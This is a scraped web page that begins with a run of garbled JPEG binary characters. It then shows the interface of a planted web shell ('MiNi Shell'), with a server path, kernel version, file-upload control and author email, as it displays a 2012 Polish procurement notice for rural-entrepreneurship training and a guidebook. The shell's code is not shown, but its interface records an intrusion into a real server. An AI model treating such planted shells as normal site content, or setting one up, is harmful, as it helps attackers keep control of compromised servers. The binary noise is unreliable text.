JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121004/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121004/382436-N-2012.html

<p class="kh_header"><b>Warszawa: Zakup usług polegających na kompleksowej realizacji projektu: Rozwój przedsiębiorczości na obszarach wiejskich w oparciu o kreatywność społeczności lokalnej</b><br>
<b>Numer ogłoszenia: 382436 - 2012; data zamieszczenia: 04.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Fundacja Programów Pomocy dla Rolnictwa FAPA , ul. Wspólna 30, 00-930 Warszawa, woj. mazowieckie, tel. 22 623 19 01, faks 22 623 19 09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.fapa.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Fundacja.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług polegających na kompleksowej realizacji projektu: Rozwój przedsiębiorczości na obszarach wiejskich w oparciu o kreatywność społeczności lokalnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W celu realizacji przedmiotu zamówienia Wykonawca zorganizuje Biuro Projektu, zwane dalej Biurem, odpowiedzialne za całość prac związanych z realizacją przedmiotu zamówienia.W celu sprawnego funkcjonowania Biura Wykonawca zapewni:zespół składający się z osób zapewniających prawidłową i terminową realizację projektu,minimum jeden numer telefonu stacjonarnego, numer telefonu komórkowego, numer faksu oraz adres mailowy i korespondencyjny,organizację pracy, która umożliwi łatwy kontakt z przedstawicielami Biura. Czas odpowiedzi na zapytanie mailowe nie może przekroczyć dwóch dni roboczych.Przedstawiciele Biura będą ściśle współpracować z Zamawiającym i na bieżąco dostarczać wszelkich informacji o realizacji Projektu.W ramach zadań Biura, Wykonawca zapewni w szczególności:Organizacja i przeprowadzenie trzydniowego szkolenia połączonego z wyjazdem studyjnym dla 45 osób.W ramach tej części zamówienia Wykonawca zapewni:kompleksową organizację i realizację trzydniowego szkolenia połączonego z wizytą studyjną mającą na celu pokazanie kreatywności w rozwijaniu prowadzonej przez siebie działalności;nabór maksymalnie 45 uczestników z całego kraju, w szczególności doradców rolnych, członków lokalnych grup działania oraz liderów organizacji pozarządowych działających na obszarach wiejskich (transport na miejsce szkolenia uczestnicy zapewniają we własnym zakresie);rekrutację uczestników, o których mowa w punkcie b) na podstawie wypełnionych i nadesłanych drogą elektroniczną kart zgłoszeniowych oraz informacji o uczestniku, opracowanych przez Wykonawcę ;zamieszczenie informacji o szkoleniu na stronie internetowej Wykonawcy oraz dystrybucję w formie elektronicznej zaproszeń do udziału w szkoleniu do wszystkich LGD w kraju, 16 Wojewódzkich Ośrodków Doradztwa Rolniczego oraz co najmniej 200 organizacji pozarządowych z całego kraju;Wszelkie pozostałe dokumenty i informacje będą zamieszczone do pobrania na stronie internetowej Wykonawcy (adres strony musi być podany w zaproszeniu).Zaproszenia oraz informacje o szkoleniu zamieszczane na stronie internetowej zostaną opatrzone logotypami i sloganami wskazanymi w Załączniku nr 7 do SIWZ - zgodnie z księgą wizualizacji znaków PROW na lata 2007-2013.opracowanie i realizację szczegółowego programu trzydniowego szkolenia w oparciu o ramowy program szkolenia stanowiący Załącznik nr 8 do SIWZ;co najmniej czterech wykładowców z wykształceniem wyższym, w zależności od tematyki wykładu, socjologicznym lub ekonomicznym oraz co najmniej 2-letnim doświadczeniem zawodowym w sektorze rozwoju przedsiębiorczości na obszarach wiejskich, w tym doświadczenie w prowadzeniu co najmniej 2 (dwóch) szkoleń lub seminariów o tematyce przedsiębiorczości w okresie ostatnich 3 lat;maksymalnie 45 zestawów szkoleniowych dla uczestników szkolenia, z których każdy zawierać będzie: teczkę kartonową (format A4, karton, zapinanych gumką),notatnik (format A5, papier offset 70-80g m2 biały w kratkę, min. 50 kartek),długopis (plastik, półautomat, 10 mm, wkład wymienny 0,5 mm),torbę papierową (wymiary: 230 x 330 x 75 mm.+ - 5 cm,  papier kredowy lakierowany 120 g m2, uchwyt podwójny sznurkowy),poradnik pt. Przedsiębiorczość wiejska. Uruchamianie i prowadzenie działalności gospodarczej na obszarach wiejskich.salę szkoleniową w zakresie niezbędnym do realizacji programu szkolenia, zgodnie z poniższymi wymaganiami:miejsce: Kraków,pojemność sali: co najmniej 50 osób, minimalne wyposażenie sali: obsługa techniczną, rzutnik, ekran, nagłośnienie, minimum 2 mikrofony, stały , bezprzewodowy dostęp do Internetu;dwa noclegi ze śniadaniem w pokojach dwu lub trzyosobowych dla maksymalnie 45 osób, w hotelu o standardzie co najmniej trzygwiazdkowym lub równoważnym (z osobnym węzłem sanitarnym w każdym pokoju) w granicach administracyjnych miasta Kraków,w budynku z salą szkoleniową, o której mowa w punkcie h); obsługę cateringową szkolenia na terenie obiektu szkoleniowego lub w odległości nie większej niż 200 m od ww. obiektu, z wyjątkiem obiadu podczas wyjazdu studyjnego, w ilości odpowiadającej liczbie uczestników szkolenia oraz wykładowców, w szczególności: 5 przerw kawowych (kawa, herbata, woda ciastka), 3 dwudaniowych obiadów z napojami, 2 śniadania, 2 kolacje, zgodnie z programem szkolenia, o którym mowa w punkcie e);wyjazd studyjny na terenie województwa małopolskiego do przynajmniej dwóch podmiotów prezentujących kreatywne formy różnicowania działalności gospodarczej na obszarach wiejskich  zgodnie z programem szkolenia, o którym mowa w podpunkcie e),transport autokarowy dla 45 uczestników szkolenia na trasie z miejsca zakwaterowania do miejsca przeznaczenia wyjazdu studyjnego i z powrotem;ubezpieczenie dla 45 uczestników szkolenia - NNW;opracowanie i wydruk zaświadczeń dla maksymalnie 45 uczestników o udziale w szkoleniu.Wykonawca przedstawi Zamawiającemu do akceptacji szczegółowy program szkolenia, o którym mowa w punkcie e)  oraz listę wykładowców najpóźniej na 2 tygodnie przed terminem szkolenia. Zamawiający w ciągu 4 dni roboczych zaakceptuje lub zgłosi uwagi do przedstawionego programu szkolenia oraz listy wykładowców, wyznaczając odpowiedni termin do ich uwzględnienia.Wszystkie materiały szkoleniowe (program szkolenia, karta zgłoszeniowa, teczka, notatnik, długopis, torba papierowa oraz poradnik, o którym mowa w punkcie 3.2), program szkolenia, karty zgłoszeniowe, zaświadczenia o udziale w szkoleniu, a także prezentacje lub treści, abstrakty, konspekty przygotowane przez wykładowców dla uczestników muszą być opatrzone logotypami i sloganami wskazanymi w Załączniku nr 7 do SIWZ - zgodnie z księgą wizualizacji znaków PROW na lata 2007-2013.Długopisy, ze względu na mały rozmiar, mogą być opatrzone samymi logotypami wskazanymi w Załączniku nr 7 do SIWZ - zgodnie z księgą wizualizacji znaków PROW na lata 2007-2013.Termin realizacji tej części zamówienia: do 15.12.2012 r.Opracowanie merytoryczne i przygotowanie  na płycie CD o pojemności 700 MB -  elektronicznej wersji poradnika pt. Przedsiębiorczość wiejska. Uruchamianie i prowadzenie działalności gospodarczej na obszarach wiejskich.W ramach tej części zamówienia Wykonawca zapewni:zespół redakcyjny, składający się z co najmniej czterech osób, z wykształceniem wyższym socjologicznym lub ekonomicznym oraz wiedzą i doświadczeniem w zakresie prac nad co najmniej 1 poradnikiem z zakresu aktywizacji społeczności na obszarach wiejskich lub biuletynu w tym zakresie, pod nadzorem kierownika zespołu redakcyjnego posiadającego wiedzę i doświadczenie niezbędne do merytorycznego nadzorowania prac nad poradnikiem;merytoryczne opracowanie i wykonanie elektronicznej wersji poradnika pt.: Przedsiębiorczość wiejska. Uruchamianie i prowadzenie działalności gospodarczej na obszarach wiejskich w formacie umożliwiającym umieszczenie i odtworzenie na płycie CD, zawierającego co najmniej 5 arkuszy autorskich (arkusz autorski - 40.000 znaków typograficznych wraz ze spacjami lub 3.000 cm2 ilustracji) nt. przedsiębiorczości wiejskiej, rejestracji działalności gospodarczej, socjologicznych predyspozycji prowadzenia działalności gospodarczej, zarządzania firmą, możliwości pozyskania środków finansowych na działalność gospodarczą, rejestracji działalności gospodarczej -  według następującego konspektu:OKŁADKA 1 - strona tytułowa wraz z logotypami i sloganami wskazanymi w Załączniku nr 7 do SIWZ. OKŁADKA 2 - informacja o sposobie finansowania projektu i informatora z funduszy KSOW, informacje redakcyjne.TREŚĆ OKŁADKA 3 - Logotypy i slogany  wykonawcy i partnerów projektu. OKŁADKA 4 -  Logotypy i slogany wskazane w Załączniku nr 7 do SIWZ.Minimalny zakres tematyczny: Zanim zostaniesz przedsiębiorcą. Uwarunkowania lokalne oraz aspekty psychologiczne zakładania działalności gospodarczej na obszarach wiejskich.- Uruchamianie działalności gospodarczej. Prowadzenie działalności gospodarczej.- Innowacyjne przykłady działalności gospodarczej realizowanej na obszarach wiejskich.styl i język tekstów musi być dostosowany do specyfiki poradnika;merytoryczne i graficzne opracowanie poradnika, w tym korektę językową przed łamaniem tekstu oraz drugą korektę w ramach poprawek korektorskich po łamaniu tekstu, z uwzględnieniem poprawek Zamawiającego;50 kopii poradnika na płytach CD w opakowaniach zabezpieczających, wraz z nadrukiem zawierającym na okładce tytuł oraz logotypy i slogany wskazane w Załączniku nr 7 do SIWZ -zgodnie z księgą wizualizacji znaków PROW na lata 2007-2013.Wybrany przez Wykonawcę ostateczny skład zespołu redakcyjnego (wraz z załączonymi CV jego członków) zostanie przedstawiony Zmawiającemu na co najmniej 7 dni przed rozpoczęciem prac nad poradnikiem. Zamawiający w ciągu 3 dni roboczych zaakceptuje lub zgłosi uwagi do przedstawionego składu zespołu redakcyjnego, wyznaczając odpowiedni termin do ich uwzględnienia.Ostateczny wygląd i treść poradnika muszą zostać zaakceptowane przez Zamawiającego najpóźniej na 7 dni przed datą przygotowania elektronicznej wersji poradnika. Wykonawca wykona i dostarczy Zamawiającemu płyty z poradnikiem w miejsce przez niego wskazane. Sposób transportu oraz opakowanie artykułów (płyt) musi zapewniać zabezpieczenie przed uszkodzeniami. Za szkody powstałe z winy nienależytego opakowania lub transportu odpowiedzialność ponosi Wykonawca.Teksty i zdjęcia zamieszczone w poradniku, muszą być w całości dziełami autorskimi. Nie mogą być wykorzystywane w całości ani w części w innych dziełach przygotowywanych przez Wykonawcę. Zamawiający wymaga przeniesienia majątkowych praw autorskich do poradnika zarówno na siebie, jak również Ministerstwo Rolnictwa i Rozwoju Wsi.Termin realizacji tej części zamówienia: do 30.11.2012 r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.95.00.00-8, 55.10.00.00-1, 55.30.00.00-3, 79.96.00.00-1, 92.31.22.10-6, 79.82.25.00-7, 79.82.20.00-2, 79.82.11.00-6, 97.82.40.00-6, 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek ten za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy niż 3 lata - w tym okresie, wykonał lub wykonuje, co najmniej 3 (trzy) usługi o wartości każdej usługi nie mniejszej niż 40 000,00 zł brutto (słownie: czterdzieści tysięcy złotych 00/100), z których każda polegała na zapewnieniu kompleksowej organizacji seminariów lub szkoleń z zakresu aktywizacji społeczności na obszarach wiejskich, obejmujących łącznie co najmniej wyżywienie oraz zakwaterowanie uczestników i każda z tych usług organizowana była dla co najmniej 45 osób. Wykonanie jednej usługi jest równoznaczne z wykonaniem jednej umowy (jednego zamówienia na rzecz jednego Zamawiającego)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej:4 wykładowcami  z wykształceniem wyższym, w zależności od tematyki wykładu, socjologicznym lub ekonomicznym oraz co najmniej 2-letnim doświadczeniem zawodowym w sektorze rozwoju przedsiębiorczości na obszarach wiejskich, w tym doświadczenie w prowadzeniu co najmniej 2 (dwóch) szkoleń lub seminariów o tematyce przedsiębiorczości  w okresie ostatnich 3 lat.Kierownikiem zespołu redakcyjnego z wykształceniem wyższym, co najmniej w stopniu naukowym doktora oraz wiedzą i doświadczeniem niezbędnym do merytorycznego nadzorowania prac nad poradnikiem, w tym opublikowanie pod redakcją tej osoby przynajmniej 5 poradników z zakresu aktywizacji społeczności na obszarach wiejskich.4 członkami zespołu redakcyjnego z wykształceniem wyższym socjologicznym lub ekonomicznym oraz wiedzą i doświadczeniem w zakresie prac nad co najmniej 1 poradnikiem z zakresu aktywizacji społeczności na obszarach wiejskich lub biuletynu w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.fapa.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Fundacja Programów Pomocy dla Rolnictwa FAPA ul. Wspólna 30, 00-930 Warszawa, pok. 253.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2012 godzina 10:00, miejsce: Fundacja Programów Pomocy dla Rolnictwa FAPA ul. Wspólna 30, 00-930 Warszawa, pok. 253.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Schemat III Pomocy Technicznej Programu Rozwoju Obszarów Wiejskich na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com